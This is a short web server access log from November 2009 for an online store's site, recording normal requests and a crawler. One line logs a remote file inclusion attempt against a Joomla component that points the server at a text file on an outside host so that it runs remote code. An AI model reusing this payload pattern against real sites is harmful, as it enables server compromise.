98.125.95.195 - - [26/Nov/2009:00:38:49 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0183A25880214000A24C014+M37+ENG HTTP/1.1" 200 50310 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0183A25381C1A000A27C014+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:49 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
83.103.72.130 - - [26/Nov/2009:00:39:02 -0500] "GET /logs/access_log.Q109052600//index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:00:39:06 -0500] "GET /logs/error_log.Q109062400 HTTP/1.0" 200 2057400 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
